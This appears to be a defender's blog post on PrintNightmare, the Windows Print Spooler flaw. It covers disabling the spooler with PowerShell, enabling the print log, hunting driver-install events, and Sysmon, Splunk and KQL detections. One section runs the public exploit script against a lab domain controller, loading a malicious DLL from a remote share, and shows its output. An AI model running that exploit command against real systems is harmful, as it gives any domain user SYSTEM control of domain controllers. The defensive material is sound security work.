Detection & Remediation - PrintNightmare 0-day (CVE-2021-1675)
Santhosh Baswa
Security @ TikTok | PEP - No Sponsorship Required | Leadership | Architect | Speaker | Python | DFIR | Threat Hunting | SIEM | Security Automation (SOAR) | R&D
PrintNightmare is a recently disclosed 0-day exploit against the Windows Print Spooler service, and it matters most on servers that run the spooler, above all domain controllers: a threat actor holding any domain account can use the vulnerability to take over a Windows domain controller. (Microsoft later tracked the remote code execution as CVE-2021-34527; the proof-of-concept used below is named after the original identifier, CVE-2021-1675.)
The information below may be useful to CSIRT/SOC teams taking proactive response actions against the PrintNightmare exploit.
Attack Simulation:
The Print Spooler service is enabled by default on Windows, including on domain controllers, so any remote authenticated domain user can execute code as SYSTEM on the domain controller by making the spooler load a DLL from a share the attacker controls.
$r3b00t@peter:python3 CVE-2021-1675.py reboot.labs/[email protected] '\\test.reboot.labs\sharedrive\testevil.dll'
Password:
[*] Try 1...
[*] Connecting to ncacn_np:192.168.1.134[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\test.reboot.labs\sharedrive\testevil.dll
[*] Stage0: 0
[*] Try 2...
[*] Connecting to ncacn_np:192.168.1.134[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\test.reboot.labs\sharedrive\testevil.dll
[*] Stage0: 0
[*] Stage2: 0
[+] Exploit Completed
Disable the Print Spooler service
Running the same exploit against the server after the Spooler service has been stopped and disabled:
$r3b00t@peter:python3 CVE-2021-1675.py reboot.labs/[email protected] '\\test.reboot.labs\sharedrive\testevil.dll'
Password:
[*] Try 1...
[*] Connecting to ncacn_np:192.168.1.134[\PIPE\spoolss]
[-] Connection Failed.
Blue Team Strategy:
Disable the Print Spooler service (infra level):
The PowerShell script below stops and disables the Print Spooler service on each server in a supplied list, but only if that server has nothing beyond the default printers; a server that actually hosts print queues is left alone so it can be handled separately.
PowerShell script: https://github.com/gtworek/PSBits/blob/master/Misc/StopAndDisableDefaultSpoolers.ps1
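As an added example (this is not gtworek's script and not part of the original post), the same idea as a small remoting loop: every server in servers.txt (an assumed file name, one host per line) has its spooler stopped and disabled unless it hosts a print queue beyond the ones Windows creates by itself. It needs PowerShell remoting and local admin rights on the targets.

```powershell
# Added example for this post; it is not gtworek's StopAndDisableDefaultSpoolers.ps1.
# Stops and disables the Print Spooler on every server listed in servers.txt
# (assumed file name, one host per line) unless that server hosts a print queue
# beyond the ones Windows creates by itself. Needs PowerShell remoting and
# local admin rights on the targets.
$servers = Get-Content -Path .\servers.txt

# Queues Windows installs on its own; a server with only these is not a print server.
$defaultQueues = @('Microsoft XPS Document Writer', 'Microsoft Print to PDF', 'Fax')

$results = Invoke-Command -ComputerName $servers -ArgumentList (,$defaultQueues) -ScriptBlock {
    param([string[]]$defaults)

    $svc = Get-Service -Name Spooler
    $custom = @()
    if ($svc.Status -eq 'Running') {
        # Get-Printer talks to the spooler, so queues can only be listed while it runs.
        $custom = @(Get-Printer -ErrorAction SilentlyContinue |
                    Where-Object { $defaults -notcontains $_.Name })
    }

    if ($custom.Count -gt 0) {
        # Leave real print servers alone; they need the patch, not a dead spooler.
        $action = 'skipped, non-default queues: ' + ($custom.Name -join ', ')
    } else {
        if ($svc.Status -ne 'Stopped') { Stop-Service -Name Spooler -Force }
        # Disabled rather than Manual: anything able to start the service
        # (a printer install, a scheduled task) would reopen \PIPE\spoolss.
        Set-Service -Name Spooler -StartupType Disabled
        $action = 'stopped and disabled'
    }

    $after = Get-Service -Name Spooler
    [pscustomobject]@{
        Computer  = $env:COMPUTERNAME
        Action    = $action
        Status    = $after.Status
        StartType = $after.StartType
    }
}

# Any row still Running, or with a StartType other than Disabled, is a server to check by hand.
$results | Sort-Object Computer | Format-Table Computer, Action, Status, StartType -AutoSize
```

The output table doubles as the verification step: a domain controller that reports Status Stopped and StartType Disabled is the state in which the exploit above fails with "Connection Failed".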
Enable the Print Spooler operational log:
The Microsoft-Windows-PrintService/Operational log is off by default; switch it on with the .NET EventLogConfiguration class (the type name and log name must be on one line):
# Enable the PrintService Operational log so driver add/update events are recorded
$log = New-Object System.Diagnostics.Eventing.Reader.EventLogConfiguration "Microsoft-Windows-PrintService/Operational"
$log.IsEnabled = $true
$log.SaveChanges()
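Once the log is enabled it can be hunted. The following is an added example, not code from the original post: it pulls the driver add/update records (event ID 316, "Printer driver ... was added or updated", in Microsoft-Windows-PrintService/Operational) from a server for the last 24 hours and, alongside them, lists files written to the x64 driver store in the same window together with their Authenticode status. The computer name, lookback window and the default %SystemRoot% location of the driver store are assumptions.

```powershell
# Added example for this post (not the author's code): hunt a single server for
# PrintNightmare driver installs after the Operational log has been enabled.
# Assumptions: $ComputerName is reachable over RPC and admin shares, and the
# driver store lives at the default C:\Windows\System32\spool\drivers\x64\3.
$ComputerName  = 'dc01'          # assumed host name
$LookbackHours = 24
$since = (Get-Date).AddHours(-$LookbackHours)

# Event 316: "Printer driver <name> for Windows <arch> was added or updated. Files:- <list>".
# The exploit has to get a driver added, so this is the record to watch on a
# domain controller that should never see a driver install.
$driverEvents = Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PrintService/Operational'
    Id        = 316
    StartTime = $since
} -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message

# Files that landed in the driver store in the same window. A driver added by
# the exploit is the attacker's DLL, so an unsigned or oddly signed new file
# next to a 316 event is the thing to investigate.
$driverRoot = "\\$ComputerName\C$\Windows\System32\spool\drivers\x64\3"
$newFiles = Get-ChildItem -Path $driverRoot -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.CreationTime -ge $since } |
    ForEach-Object {
        $sig = Get-AuthenticodeSignature -FilePath $_.FullName
        [pscustomobject]@{
            File      = $_.FullName
            Created   = $_.CreationTime
            Signature = $sig.Status
            Signer    = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
        }
    }

"== Driver add/update events on $ComputerName since $since =="
$driverEvents | Format-Table TimeCreated, Id, Message -AutoSize -Wrap
"== Driver store files created on $ComputerName since $since (Signature other than Valid: investigate) =="
$newFiles | Sort-Object Created | Format-Table File, Created, Signature, Signer -AutoSize
```

On a domain controller with the spooler still running, an empty first table is the expected baseline; any 316 event there, and any new file in the driver store whose signature is not Valid, is worth pulling the file hash for and feeding into the SIEM queries below.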
Sysmon Config:
XML Config: https://github.com/LaresLLC/CVE-2021-1675/blob/main/CVE-2021-1675.xml
SIEM: Splunk query
index=sysmon Image="C:\\Windows\\System32\\spoolsv.exe" | stats values(ImageLoaded), values(TargetObject), values(Details), values(TargetFilename)
Sentinel KQL query:
let serverlist=DeviceInfo
| where DeviceType != "Workstation"
| distinct DeviceId;
let suspiciousdrivers=DeviceImageLoadEvents
| where DeviceId in (serverlist)
| where FolderPath startswith @"c:\windows\system32\spool\drivers"
| distinct SHA1
| invoke FileProfile(SHA1, 1000)
| where GlobalPrevalence < 50 and IsRootSignerMicrosoft != 1 and SignatureState != "SignedValid";
suspiciousdrivers
| join kind=inner (DeviceImageLoadEvents
| where DeviceId in (serverlist)
| where FolderPath startswith @"c:\windows\system32\spool\drivers") on SHA1
| where InitiatingProcessFileName != "ccmexec.exe"
// Optionally filter for only the print spooler loading the driver to make it specific to this attack
//| where InitiatingProcessFileName == "spoolsv.exe"
References:
[+] https://twitter.com/NathanMcNulty/status/1410289115354914820
[+] https://twitter.com/wdormann/status/1410198834970599425
[+] https://twitter.com/gentilkiwi/status/1410066827590447108
[+] https://twitter.com/cyb3rops/status/1410250996362715137
[+] https://twitter.com/markus_neis/status/1410255678996942854
[+] https://twitter.com/olafhartong/status/1410228896717541378
[+] https://github.com/LaresLLC/CVE-2021-1675
[+] https://github.com/gtworek/PSBits